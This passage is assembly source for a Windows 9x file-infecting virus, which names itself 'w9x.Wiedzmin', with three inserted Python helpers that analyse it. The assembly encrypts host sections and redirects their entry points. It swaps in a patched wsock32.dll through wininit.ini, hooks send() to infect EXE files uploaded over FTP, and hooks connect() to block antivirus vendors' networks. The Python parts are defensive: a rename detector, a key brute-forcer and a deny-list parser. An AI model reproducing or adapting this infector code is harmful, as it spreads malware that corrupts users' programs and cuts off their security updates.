push dword ptr [ebp+hdc]
call dword ptr [ebp+_SelectObject] ;gdi
push 0
push dword ptr [ebp+hdc]
call dword ptr [ebp+_SetBkMode] ;gdi
mov eax,dword ptr [ebp+color+ebx]
add ebx,4
cmp ebx,4*4
jl @n1
xor ebx,ebx
@n1:
push eax
push dword ptr [ebp+hdc]
call dword ptr [ebp+_SetTextColor] ;gdi
push 1
lea eax,[ebp+jed]
push eax
push dword ptr [ebp+p_y]
push dword ptr [ebp+p_x]
push dword ptr [ebp+hdc]
call dword ptr [ebp+_TextOutA] ;gdi
mov eax,dword ptr [ebp+screen_y]
cmp dword ptr [ebp+p_y],eax
jae chang_g
mov eax,dword ptr [ebp+screen_x]
add dword ptr [ebp+p_x],13
cmp dword ptr [ebp+p_x],eax
jle spp
mov dword ptr [ebp+p_x],0
add dword ptr [ebp+p_y],15
jmp spp
chang_g: mov dword ptr [ebp+p_y],0
spp:
push 50
call dword ptr [ebp+_Sleep]
ret
c_font:
push offset famil
xor eax,eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push 9
push 9
call dword ptr [ebp+_CreateFontA] ;gdi
mov [font],eax
ret
@GDI_APIZ: db "CreateFontA",0
db "TextOutA",0
db "SetBkMode",0
db "SetTextColor",0
db "SelectObject",0
db 77h
db "GetSystemMetrics",0 ;user32 part X-D
db "GetDesktopWindow",0
db "GetWindowDC",0
db "ReleaseDC",0
db 69h
;************************************************************************************************
;Handle this sucker ;]
;************************************************************************************************
@crypt_host:
;push dword ptr [ebp+key_next]
pushad
mov eax,dword ptr [ebp+fMapReal]
mov esi,[eax+3ch]
add esi,eax ;ESI => PE HEADER
mov edi,esi
xor eax,eax
mov ax,[esi + 06h] ;load number of sections
mov ecx,0h ;28 bytes for each section header
add esi,ecx ; Normalize
add esi,78h ; Ptr to dir table
mov edx,[edi+74h] ; EDX = number of dir entries
shl edx,3 ; EDX = EDX*8
add esi,edx ; ESI = Ptr to last section
mov ecx,[edi+28h]
search_it:
mov ebx,dword ptr [esi+0ch]
add ebx,dword ptr [esi+08h]
inc eax
cmp ecx,ebx
jb sfound
dec eax
jz @e_error
add esi,28h
jmp search_it
sfound:
test dword ptr [esi+24h],10000000h ;check section atributes
jnz @e_error
or dword ptr [esi+24h],0A0000020h
cmp dword ptr [esi],'xet.'
je _01
cmp dword ptr [esi],'EDOC'
je _01
mov dword ptr [ebp+help_virus],1
_01:
push eax
;STEP GET RAW ADDRESS
mov edx,ecx
sub edx,dword ptr [esi+0ch] ;IMAGEBASE - VIRTUAL RVA=0
add edx,[esi+014h] ;ADD RAW OFFSET
mov dword ptr [ebp+e_where],edx
push edx
mov edx,[esi+010h]
mov dword ptr [ebp+e_bytes],edx
pop edx
add edx,dword ptr [ebp+fMapReal] ;WHERE TO CRYPT!
mov ecx,[esi+10h]
mov dword ptr [ebp+e_god],0
mov dword ptr [ebp+firstk],1h
pushad
lea edi,[ebp+key_next]
call @GGEN_KEY
call @combine_key
mov eax,dword ptr [ebp+key_next]
popad
mov dword ptr [ebp+firstk],0
push esi
mov eax,dword ptr [ebp+key_next]
xor ebx,ebx
@loop_it:
;=> IF 5 BYTES ARE ZEROZ THEN DON'T CRYPT BELOW
cmp byte ptr [edx],00h
jne @go_
cmp byte ptr [edx+1],00h
jne @go_
cmp byte ptr [edx+2],00h
jne @go_
cmp byte ptr [edx+3],00h
jne @go_
cmp byte ptr [edx+4],00h
je @crypted
@go_:
xor byte ptr [edx],al
inc edx
loop @loop_it
jmp @e_out
@crypted:
pop esi
mov eax,dword ptr [ebp+e_bytes]
sub eax,ecx
mov dword ptr [ebp+e_bytes],eax
jmp @e_out
@e_error:
@e_out:
pop eax
cmp dword ptr [ebp+help_virus],1
je @mute_other_virus
popad
ret
;ENTRY: EDI - BUFFER
@combine_key:
mov eax,dword ptr [ebp+key2]
stosd
add eax,dword ptr [ebp+key]
lea edi,[ebp+key_main]
stosd
ret
;**************************************************************************
;UNCRYPT *|*
;**************************************************************************
@uncrypt:
call delta_e
delta_e: pop ebp
sub ebp,offset delta_e
pushad
mov edx,dword ptr [ebp+imagebase]
add edx,dword ptr [ebp+hosteip]
mov ecx,dword ptr [ebp+e_bytes]
xor ebx,ebx
mov eax,[ebp+key_next]
@lloop_it:
xor byte ptr [edx],al
inc edx
loop @lloop_it
f_e:
cmp dword ptr [ebp+czy_je],0
jne @helper_endd
popad
ret
@helper_endd:
popad
mov eax,dword ptr [ebp+hosteip]
add eax,dword ptr [ebp+imagebase]
jmp eax
czy_je dd 0
e_bytes dd 0
e_where dd 0
e_god dd 0
hosteip dd 0
imagebase dd 0
key_next dd 0
@helper_end: nop
;***********************************************************
@mute_other_virus:
mov eax,dword ptr [ebp+fMapReal]
mov esi,[eax+3ch]
add esi,eax ;ESI => PE HEADER
mov edi,esi
xor eax,eax
mov ax,[esi + 06h] ;load number of sections
mov ecx,28h ;28 bytes for each section header
dec eax ;seeking for last,...
mul ecx ;and mul it
add esi,eax ; Normalize
add esi,78h ; Ptr to dir table
mov edx,[edi+74h] ; EDX = number of dir entries
shl edx,3 ; EDX = EDX*8
add esi,edx ; ESI = Ptr to last section
mov edx,[esi+10h] ; EDX = SizeOfRawData
mov ebx,edx ; EBX = EDX
add edx,[esi+14h] ; EDX = EDX+PointerToRawData
push edx ; Preserve EDX
mov eax,ebx ; EAX = EBX
add eax,[esi+0Ch] ; EAX = EAX+VA Address
; EAX = New EIP
mov [edi+28h],eax ; Change the new EIP
mov dword ptr [ebp+NewEIP],eax ; Also store it
mov eax,dword ptr [ebp+fSize]
add eax,helper
mov ecx,[edi+3Ch]
call Align_
mov [esi+10h],eax
mov [esi+08h],eax
pop edx
mov eax,[esi+10h]
add eax,[esi+0Ch]
mov [edi+50h],eax
lea esi,[ebp+@uncrypt] ; ESI = Ptr to virus_start
xchg edi,edx ; EDI = Raw ptr after last
add edi,dword ptr [ebp+fMapReal] ;EDI = Normalized ptr
mov ecx,helper
mov dword ptr [ebp+czy_je],1
rep movsb
push dword ptr [ebp+offset fMapReal]
call dword ptr [ebp+_UnmapViewOfFile]
push dword ptr [ebp+fHndMap]
call dword ptr [ebp+_CloseHandle]
mov ecx,dword ptr [ebp+fSize]
add ecx,helper
call @zostaf
push dword ptr [ebp+fHnd]
call dword ptr [ebp+_CloseHandle]
popad
ret
;************************************************************************************************
;Wsock32 hooker!!!
;************************************************************************************************
@wsockz:
mov eax,dword ptr [ebp+_GetSystemDirectoryA]
mov ebx,dword ptr [ebp+_GPA]
push 260
lea eax,[ebp+sysDIR]
push eax
call dword ptr [ebp+_GetSystemDirectoryA]
lea eax,[ebp+offset winDIRr]
push 260
push eax
call dword ptr [ebp+_GetWindowsDirectoryA]
lea edi,[ebp+sysDIR]
lea esi,[ebp+wsock]
call strcat
lea edi,[ebp+winDIRr]
lea esi,[ebp+nowe]
call strcat
push 1
lea eax,[ebp+winDIRr]
push eax
lea eax,[ebp+sysDIR]
push eax
call dword ptr [ebp+_CopyFileA]
cmp eax,0
je bye
lea edi,[ebp+finddata.cFileName]
lea esi,[ebp+winDIRr]
call strcat
mov dword ptr [ebp+go_wsock],1
push dword ptr [ebp+hosteip]
push dword ptr [ebp+imagebase]
call @infect
pop dword ptr [ebp+imagebase]
pop dword ptr [ebp+hosteip]
cmp edx,-1
je bye
mov dword ptr [ebp+capis],0
mov eax,dword ptr [ebp+fMapReal]
mov dword ptr [ebp+wsock_h],eax
call @go_export
call _God
mov dword ptr [ebp+go_wsock],0
lea eax,[ebp+WININIT]
push eax
lea eax,[ebp+winDIRr]
push eax
lea eax,[ebp+sysDIR]
push eax
lea eax,[ebp+rename]
push eax
call dword ptr [ebp+_WritePrivateProfileStringA]
bye: ret
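@wsockz stages a copy of wsock32.dll under the Windows directory, patches that copy, and then writes a [rename] entry (destination=source) into wininit.ini so the patched copy replaces the system DLL at the next reboot. As an added example, not part of the original file, the Python below reads the [rename] section of a wininit.ini-style file and reports entries that overwrite a file under the system directory with one staged elsewhere, singling out network DLLs. The file contents, the paths and the copy's name are constructed for the example; the page does not give the real target name (the `nowe` string), and the watch list is an assumption about which modules matter most.

```python
import ntpath

# Network-stack modules whose replacement through [rename] deserves the loudest alert (assumed list).
WATCHED_DLLS = {"wsock32.dll", "ws2_32.dll", "wininet.dll"}

# Constructed sample wininit.ini: one delete, one benign in-place update, two replacements
# staged from outside the system directory (the WSOCK32X.DLL name is a placeholder).
SAMPLE_WININIT = rb"""[rename]
NUL=C:\WINDOWS\TEMP\~OLD.TMP
C:\WINDOWS\SYSTEM\WSOCK32.DLL=C:\WINDOWS\WSOCK32X.DLL
C:\WINDOWS\SYSTEM\FOO.DLL=C:\WINDOWS\SYSTEM\FOO.TMP
C:\WINDOWS\SYSTEM\NEWDRV.VXD=C:\WINDOWS\TEMP\NEWDRV.VXD
"""


def parse_rename_entries(ini_bytes):
    """Return (destination, source) pairs from the [rename] section.
    wininit.ini lines read DESTINATION=SOURCE; a destination of NUL deletes SOURCE."""
    entries, in_rename = [], False
    for raw in ini_bytes.decode("latin-1").splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_rename = line[1:-1].strip().lower() == "rename"
            continue
        if in_rename and "=" in line:
            dest, src = line.split("=", 1)
            entries.append((dest.strip(), src.strip()))
    return entries


def suspicious_renames(ini_bytes, system_dir="C:\\WINDOWS\\SYSTEM"):
    """Return (dest, src, reason) for entries that replace a file under system_dir
    with a file staged outside it. Deletions and in-place updates are skipped."""
    sysdir = ntpath.normcase(system_dir.rstrip("\\")) + "\\"
    hits = []
    for dest, src in parse_rename_entries(ini_bytes):
        d, s = ntpath.normcase(dest), ntpath.normcase(src)
        if d == "nul" or not d.startswith(sysdir):
            continue
        if s.startswith(sysdir):
            continue  # staged from inside the system directory: ordinary installer behaviour
        reason = ("replaces network DLL" if ntpath.basename(d) in WATCHED_DLLS
                  else "replaces system file")
        hits.append((dest, src, reason))
    return hits


if __name__ == "__main__":
    for dest, src, reason in suspicious_renames(SAMPLE_WININIT):
        print("%-22s %s <- %s" % (reason + ":", dest, src))
```

Because wininit.ini is processed before the system DLLs are loaded, the staged file itself is the only thing that can still be inspected before the swap happens; pairing this check with the header indicators from the PE example above gives a pre-reboot verdict on the staged copy.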
;************************************************************************************************
;STRCAT !!! It's smaller and faster (I think - but not optimized with repz)
;ENTRY:
;edi - base buffer
;esi - string to append
;************************************************************************************************
strcat:
push esi
mov esi,edi
sstrcat: lodsb
cmp al,0
jne sstrcat
dec esi
mov edi,esi
pop esi
cat_it:
lodsb
cmp al,0
je le
stosb
jmp cat_it
le:ret
;************************************************************************************************
;Filez with 'a','A','E','e','v','V' at start - wouldn't be infected ;]
;************************************************************************************************
@bad_name:
xor edi,edi
lea esi,[ebp+finddata.cFileName]
_letra:
lodsb
cmp al,'a'
je error_a
cmp al,'A'
je error_a
cmp al,'E'
je error_a
cmp al,'e'
je error_a
cmp al,'v'
je error_a
cmp al,'V'
je error_a
ret
error_a: inc edi
ret
;================================================================================================
;BYTE CRYPTING ENGINE ;] SIMPLE BUT FACKING AVERZ
;================================================================================================
@GGEN_KEY:
cmp dword ptr [ebp+firstk],1
jne @go__
mov ebx,40h
mov dword ptr [ebp+key2],0h
jmp GEN_KEY
@go__:
mov dword ptr [ebp+offset key],0000000h
mov ebx,55h
GEN_KEY:
call dword ptr [ebp+_GetTickCount]
idiv ebx ;remainder in EDX ;) a much simpler random-number
cmp edx,ebx ;algorithm than the T2000 one by Immortal Riot
jae GEN_KEY
inc edx ;WE MUST ENCODE SOMETHING, AT LEAST BY +1
cmp dword ptr [ebp+firstk],1
je @go___
mov dword ptr [ebp+offset key],edx
@go___: mov dword ptr [ebp+offset key2],edx
ret
@CRYPT_BYTEZ:
mov ecx,edx
Try_crypt:
lodsb ;read a byte, damn it :P it's in AL
cmp al,0
je _zero
cmp al,07h
je _retprog
_next: add al,cl
stosb
jmp Try_crypt
_zero: inc edi
jmp Try_crypt
_retprog: ret
@UN_CRYPT_BYTEZ:
mov ecx,dword ptr [ebp+offset key]
Try_uncrypt:
lodsb
cmp al,0h
je _zero0
cmp al,07h
je ret0
_next0: sub al,cl
stosb
jmp Try_uncrypt
_zero0: inc edi
jmp Try_uncrypt
ret0: ret
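The string layer above (@GGEN_KEY, @CRYPT_BYTEZ, @UN_CRYPT_BYTEZ) is an add-key cipher: the key is (GetTickCount mod 55h)+1, so at most 85 keys are possible, zero bytes are left alone so the NUL separators survive, and 07h ends the table. The decryptor tests the *ciphertext* for 00h and 07h, which is why a plaintext byte that wraps to either value would break the round trip. The Python below is an added example, not code from the file: it models the layer, recovers the key from ciphertext alone by scanning all 85 candidates for the one that yields plausible export names, and flags that wrap-around edge case. The API table is constructed sample data and the alphanumeric-name test is an assumption about what the table holds.

```python
KEY_MODULUS = 0x55   # @GGEN_KEY with firstk=0: key = (GetTickCount mod 55h) + 1
END_MARK = 0x07      # byte that terminates the string table
ALNUM = set(b"0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz_")

# Constructed sample table in the same layout the engine expects: NUL-separated names, 07h at the end.
API_TABLE = b"FindFirstFileA\0FindNextFileA\0GetFileSize\0CreateFileA\0WinExec\0" + bytes([END_MARK])


def derive_key(tick_count, modulus=KEY_MODULUS):
    """(tick mod modulus) + 1, as @GGEN_KEY computes it: only 'modulus' distinct keys exist."""
    return (tick_count % modulus) + 1


def crypt_strings(table, key):
    """@CRYPT_BYTEZ model: add key to each byte, skip zeros, stop at the 07h terminator."""
    out = bytearray(table)
    for i, b in enumerate(out):
        if b == END_MARK:
            break
        if b != 0:
            out[i] = (b + key) & 0xFF
    return bytes(out)


def uncrypt_strings(table, key):
    """@UN_CRYPT_BYTEZ model: the same loop with subtraction, testing the ciphertext for 0/07h."""
    out = bytearray(table)
    for i, b in enumerate(out):
        if b == END_MARK:
            break
        if b != 0:
            out[i] = (b - key) & 0xFF
    return bytes(out)


def roundtrip_safe(table, key):
    """False when some plaintext byte + key wraps to 00h or 07h: the decryptor would then
    skip that byte or stop early, so uncrypt_strings(crypt_strings(t, k), k) != t."""
    body = table.split(bytes([END_MARK]), 1)[0]
    return all((b + key) & 0xFF not in (0, END_MARK) for b in body if b != 0)


def recover_key(encrypted_table, modulus=KEY_MODULUS):
    """Brute-force the whole key space and keep every key under which all entries
    look like Win32 export names. No known plaintext is required."""
    matches = []
    for key in range(1, modulus + 1):
        plain = uncrypt_strings(encrypted_table, key).split(bytes([END_MARK]), 1)[0]
        names = [n for n in plain.split(b"\0") if n]
        if names and all(set(n) <= ALNUM for n in names):
            matches.append(key)
    return matches


if __name__ == "__main__":
    key = derive_key(41)                   # 41 mod 0x55 + 1 = 0x2A
    ct = crypt_strings(API_TABLE, key)
    print("key space size:", KEY_MODULUS, "keys; candidates:", [hex(k) for k in recover_key(ct)])
    print("round trip ok:", uncrypt_strings(ct, key) == API_TABLE, "safe:", roundtrip_safe(API_TABLE, key))
```

With ASCII names and a key of at most 0x55 no byte can wrap, so the table always survives; the `roundtrip_safe` check only matters for the same loop applied to arbitrary binary data. The name filter is what makes the brute force decisive: an uppercase letter shifted into the `:` to `@` gap, or `z` shifted past `z`, rejects every wrong key.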
;================================================================================================
;HOOKER DATA
;================================================================================================
start_h:
hooked_connect:
call get_delta
pushad
mov edx,[esp+(10*4)] ; EDX = sockaddr
mov ecx,[edx+(2*2)] ; ip
shl ecx,8 ; last octet
lea esi,[eax+DENIED]
mov edi,eax ;save EAX in EDI
scan_denied: lodsd
dec esi
shl eax,8
jz TOC
cmp ecx,eax
jne scan_denied
push WSAHOST_NOT_FOUND
call dword ptr [edi+_WSASetLastError]
popad
push -1
pop eax
jmp out_c
TOC: ;tHe oRgInal coNneCt ;]
popad
push [esp+0Ch] ;int namelen
push [esp+4+8] ;const struct sockaddr FAR* name
push [esp+8+4] ;SOCKET s
call dword ptr [eax+a_connect] ;call original connect!!!
out_c: retn 0Ch
;//////////////////////////////////////////////hooked send///////////////////////////////////////
hooked_send:
call get_delta
pushad
mov edi,eax
mov ebx,[esp+28h] ;20(PUSHAD)+8(FAR *buf)
mov eax,[ebx]
cmp eax,'ROTS' ;FTP: Storing a file ? ;)
je _ftp_store
TOS:
popad ;tHe oRgInaL sEnd
push [esp+10h] ;int flags
push [esp+4+0Ch] ;int len
push [esp+8+8] ;const char FAR * buf
push [esp+0Ch+4] ;SOCKET s
call dword ptr [eax+a_send] ;call original send!!!
out_s: retn 10h
_ftp_store: ;yeah! infect on tha fly
mov edx,[esp+28h] ;point to name =]
add edx,5 ;skip STOR and one space (5 bytes)
mov esi,[esp+28h]
@loop:
lodsb
cmp al,'.' ;find first dot
jne @loop
dec esi
mov esi,[esi] ;an exe file!?
cmp esi,'EXE.'
je try_it
cmp esi,'exe.'
je try_it
jmp TOS
try_it:
mov ecx,edi
lea edi,[ecx+offset buff]
mov esi,edx
xor edx,edx
_l:
lodsb
cmp al,0dh
je _end
stosb
inc edx
jmp _l
mov edi,edx
_end:
lea edx,[ecx+offset buff]
lea ebx,[ecx+offset inf_prog]
push ecx ;preserve ecx
push ebx
push 260
call dword ptr [ecx+gcd] ;tricky ;] GetCurrentDirectory
;ftp clients use that to locate
;file.
pop ecx ;load ecx
mov eax,edi
xor ebx,ebx
lea esi,[ecx+offset inf_prog]
_loop_1:
lodsb
inc ebx
cmp al,0
jne _loop_1
_do:
lea edi,[ecx+offset inf_prog] ;add \ to path ;]
add edi,ebx
dec edi
mov al,'\'
stosb
lea esi,[ecx+offset buff]
_l2: ;well optimised strcat
lodsb
cmp al,0
je _skipp
stosb
jmp _l2
_skipp:
lea esi,[ecx+offset santa]
lea edi,[ecx+offset inf_prog2]
_cat:
lodsb
cmp al,0
je _catt
stosb
jmp _cat
_catt:
mov al,' '
stosb
lea esi,[ecx+offset inf_prog]
_make_real:
lodsb
cmp al,0
je done
stosb
jmp _make_real
done:
mov edi,ecx
push 1
lea eax,[edi+offset inf_prog2]
push eax
call dword ptr [edi+wex]
jmp TOS
reset_err: push WSAECONNRESET
call dword ptr [edi+_WSASetLastError]
popad
push -1
pop eax
jmp out_s
;/*END-------------------------------------------------------------------------------------------
get_delta:
call @hookerdelta
@hookerdelta:
pop eax
sub eax,offset @hookerdelta
ret
my_data:
a_send dd 0
a_connect dd 0
msgg dd 0BFF44146h
DO_WPISU: _WSASetLastError dd 0
wex dd 0
gcd dd 0
WSAHOST_NOT_FOUND equ 11001
WSAECONNRESET equ 10054
buff db 110 dup (0)
inf_prog2 db 260 dup (0)
inf_prog db 260 dup (0)
santa db 'C:\Program Files\deithwen.exe',0
;santa db 'C:\WINDOWS\CALC.EXE',0
;***********DENIED LIST*************************************************************************
;thx goez to T-2000/Immortal Riot ;]
DENIED: DB 161,069,003 ; nai.com
DB 216,122,008 ; avp.com
DB 195,170,248 ; avp.ru, kaspersky.ru, avp2000.com, kasperskylab.ru
DB 193,247,150 ; avp.ch, metro.ch
DB 194,252,006 ; datafellows.com, f-secure.com
DB 195,112,025 ; drsolomon.com
DB 208,228,231 ; mcafee.com
DB 194,203,134 ; sophos.com
DB 146,145,148 ; norman.com
DB 206,204,003 ; pandasoftware.com
DB 193,004,210 ; complex.is
DB 203,037,250 ; leprechaun.com.au
DB 141,202,248 ; cai.com
DB 216,033,022 ; antivirus.com, trendmicro.com
DB 216,035,137 ; sarc.com
DB 216,086,104 ; virus.com
DB 212,029,228 ; invircible.com
DB 208,226,167 ; symantec.com
DB 207,227,040 ; grisoft.com
DB 194,105,193 ; drweb.ru
DB 000,000,000 ; end of table.
hook_end label byte
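;
; Added analysis helper (Python, not part of the Wiedzmin source): hooked_connect
; above refuses any connect() whose destination shares its first three octets
; with an entry of the DENIED table, i.e. whole /24 networks of antivirus
; vendors, so an infected host could not reach their update servers. The
; snippet recovers that table from a dump, replays the hook's SHL/CMP test for
; a given address, and doubles as a memory signature for the table. DENIED_TABLE
; is a copy of the bytes listed above; SAMPLE_DUMP, find_denied_table,
; parse_denied_table, shl8, hook_compare and would_block are my own names.

```python
"""Analysis helper for hooked_connect's deny list (added example, not part of
the Wiedzmin source). Recovers the 3-octet DENIED table from a byte blob and
replays the hook's comparison to see which destinations it would refuse."""
import ipaddress
import struct

# Copy of the DENIED table bytes exactly as laid out in the listing above:
# three octets per entry, a 000,000,000 triplet terminates it.
DENIED_TABLE = bytes([
    161, 69, 3,     216, 122, 8,    195, 170, 248,  193, 247, 150,
    194, 252, 6,    195, 112, 25,   208, 228, 231,  194, 203, 134,
    146, 145, 148,  206, 204, 3,    193, 4, 210,    203, 37, 250,
    141, 202, 248,  216, 33, 22,    216, 35, 137,   216, 86, 104,
    212, 29, 228,   208, 226, 167,  207, 227, 40,   194, 105, 193,
    0, 0, 0,
])

# Constructed stand-in for a memory dump: some padding, the table, then the
# 'send' string that follows hook_end in the source (the terminator's LODSD
# reads its first byte, which is why the hook tests for zero only after SHL).
SAMPLE_DUMP = b"\x90" * 37 + DENIED_TABLE + b"send\x00"


def find_denied_table(blob: bytes) -> int:
    """Offset of the table inside `blob`, or -1. The first four entries are
    enough to be specific while tolerating a patched or truncated tail."""
    return blob.find(DENIED_TABLE[:12])


def parse_denied_table(blob: bytes, offset: int) -> list:
    """Walk 3-byte entries from `offset` to the zero terminator and return the
    blocked /24 networks (the hook never looks at the last octet)."""
    nets = []
    while True:
        entry = blob[offset:offset + 3]
        if len(entry) < 3 or entry == b"\x00\x00\x00":
            return nets
        nets.append(ipaddress.ip_network("%d.%d.%d.0/24" % tuple(entry)))
        offset += 3


def shl8(dword_le: bytes) -> int:
    """`shl reg,8` on a little-endian dword: the top byte falls off."""
    return (struct.unpack("<I", dword_le)[0] << 8) & 0xFFFFFFFF


def hook_compare(sin_addr: bytes, entry4: bytes) -> bool:
    """The CMP in hooked_connect: ECX holds sin_addr (network order, so its
    top byte is the last octet) and EAX the 4 bytes LODSD fetched at the
    entry (3 octets plus the next entry's first byte). Both lose their top
    byte to SHL, so equality means the first three octets match."""
    return shl8(sin_addr) == shl8(entry4)


def would_block(ip: str, blob: bytes, offset: int) -> bool:
    """Replay the scan_denied loop for destination `ip` against the table at
    `offset`: True when the hook would answer WSAHOST_NOT_FOUND instead of
    calling the real connect()."""
    sin_addr = ipaddress.ip_address(ip).packed  # same layout as sockaddr_in
    pos = offset
    while True:
        entry4 = blob[pos:pos + 4]
        if len(entry4) < 4 or shl8(entry4) == 0:  # JZ TOC: end of table
            return False
        if hook_compare(sin_addr, entry4):
            return True
        pos += 3  # LODSD then DEC ESI: entries are 3 bytes apart


if __name__ == "__main__":
    off = find_denied_table(SAMPLE_DUMP)
    for net in parse_denied_table(SAMPLE_DUMP, off):
        print(net)
    for ip in ("208.228.231.5", "208.228.230.5"):
        print(ip, "blocked" if would_block(ip, SAMPLE_DUMP, off) else "allowed")
```

; Run against a process dump or unpacked sample instead of SAMPLE_DUMP to list
; which vendor networks a given variant cuts off; a hit from find_denied_table
; is also a usable static signature for this family's hooker data.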
;________________________________________________________________________________________________
;============================================================================================DATA
;________________________________________________________________________________________________
;**APIZ TO HOOK**
A1 db 'send',0
A1s equ $-A1
A2 db 'connect',0
A2s equ $-A2
e_esi dd 0
APIS db 'GetProcAddress',0
APIS_SIZE = $ - APIS
APIList: db "FindFirstFileA",0
db "FindNextFileA",0
db "FindClose",0
db "SetFileAttributesA",0
db "SetFileTime",0
db "CreateFileA",0
db "CreateFileMappingA",0
db "MapViewOfFile",0
db "UnmapViewOfFile",0
db "GetFileTime",0
db "GetFileSize",0
db "GetFileAttributesA",0
db "SetFileAttributesA",0
db "ReadFile",0
db "WriteFile",0
db "SetFilePointer",0
db "SetEndOfFile",0
db "CloseHandle",0
db "SetCurrentDirectoryA",0
db "GetWindowsDirectoryA",0
db "GetSystemDirectoryA",0
db "CopyFileA",0
db "ExitProcess",0
db "GetTickCount",0
db "GetCommandLineA",0
db "IsDebuggerPresent",0
db "OutputDebugStringA",0
db "WinExec",0
db "LoadLibraryA",0
db "GetModuleHandleA",0
db "Sleep",0
db "GetSystemTime",0
db "WritePrivateProfileStringA",0
db "VirtualAlloc",0
db "VirtualFree",0
db "GetCurrentDirectoryA",0,07h ;07h stops the lookup
msg dd 0BFF44146h
key dd 0
;shit7 db "w.dll",0
marker db 'sru.exe',0
;marker db '*.exe',0
TO_CRYPT_DATA: to_ja: db 0ah,0dh
db "<22><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>",0ah,0dh
db "<w9x.Wiedzmin (c) - YuP - Welcome to new school>",0ah,0dh
db "¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥",0ah,0dh
db "Æ Deithwen Addan Flared Again",0ah,0dh
db "Æ You have eyez, but u can't see",0ah,0dh
db "Æ You have earz, but u can't hear",0ah,0dh
db "Æ Wake up from unreal world before",0ah,0dh
db "Æ you drown in the Sea of Chaos.",0ah,0dh
db "<22><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>",0ah,0dh
db "¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥",0ah,0dh
db 0ah,0dh,0
wsock db "\WSOCK32.dll",0
nowe db "\WZZOCK32.dll",0
sice9x db "\\.\SICE",0
sle db "WSASetLastError",0
user32 db "USER32.DLL",0
gdi32 db "GDI32.DLL",0
WININIT db "WININIT.INI",0
rename db "rename",0
jed db "X",0
famil db "Verdana",0
logo db ": w9x.WiEDZMiN has you :",0
deshit db "kfe",0,07h
@crypt_my_body:
push ecx
call dword ptr [ebp+_GetTickCount]
mov ebx,255
idiv ebx
mov ecx,edx
@mutualisk:
mov byte ptr [edi],90h
inc edi
loop @mutualisk
pop ecx
pushad
lea edx,[ebp+offset @to_this]
mov eax,[ebp+key_main]
mov ecx,TO_DE
@loop_decryptt:
xor byte ptr [edx],al
inc edx
loop @loop_decryptt
@end_de:
popad
rep movsb
mov edi,'!PUY'
call @main_decryptor
ret
key_main dd 0
;db 5 dup (90h)
; align dword
VirusEnd label byte
;==================================================FIND=========================================
;=============================================VirtualData does not go into the virus=============
HeapStart label byte
finddata WIN32_FIND_DATA <> ;pointer to the structure
fileHandle dd 0
fileAtrib dd 0
licznik_b dd 0
APIListA: _FindFirstFileA dd 0
_FindNextFileA dd 0
_FindClose dd 0
_SetAttributesA dd 0
_SetFileTime dd 0
_CreateFileA dd 0
_CreateFileMappingA dd 0
_MapViewOfFile dd 0
_UnmapViewOfFile dd 0
_GetFileTime dd 0
_GetFileSize dd 0
_GetFileAttributesA dd 0
_SetFileAttributesA dd 0
_ReadFile dd 0
_WriteFile dd 0
_SetFilePointer dd 0
_SetEndOfFile dd 0
_CloseHandle dd 0
_SetCurrentDirectoryA dd 0
_GetWindowsDirectoryA dd 0
_GetSystemDirectoryA dd 0
_CopyFileA dd 0
_ExitProcess dd 0
_GetTickCount dd 0
_GetCommandLineA dd 0
_IsDebuggerPresent dd 0
_OutputDebugStringA dd 0
_WinExec dd 0
_LoadLibraryA dd 0
_GetModuleHandleA dd 0
_Sleep dd 0
_GetSystemTime dd 0
_WritePrivateProfileStringA dd 0
_VirtualAlloc dd 0
_VirtualFree dd 0
_GetCurrentDirectoryA dd 0
@GDI_APIZA: _CreateFontA dd 0
_TextOutA dd 0
_SetBkMode dd 0
_SetTextColor dd 0
_SelectObject dd 0
_GetSystemMetrics dd 0
_GetDesktopWindow dd 0
_GetWindowDC dd 0
_ReleaseDC dd 0
SYSTEM_TIME: wYear dw 0
wMonth dw 0
wDayOfWeek dw 0
wDay dw 0
wHour dw 0
wMinute dw 0
wSecond dw 0
wMilliseconds dw 0
F1: dd 2 dup (?)
F2: dd 2 dup (?)
F3: dd 2 dup (?)
vbuf dd 0
help_virus dd 0
memory dd 0
header dd 0
align dd 0
_hostIP dd 0
_secAlign dd 0
newEIP dd 0
NewEIP dd 0
firstk dd 0
key2 dd 0
go_wsock dd 0
wsock_h dd 0
moj_address dd 0
capis dd 0
wsock_hh dd 0
NON dd 0 ;numbers of names
AOF dd 0 ;addr of Functions
AON dd 0 ;addr of Names
AOO dd 0 ;addr of Ordinals
IndexA dd 0
_GPA dd 0
fHnd dd 0
fHndMap dd 0
fMapReal dd 0
fSize dd 0
my_seh dd 0
was_win dd 0
ic dd 0
sHnd dd 0
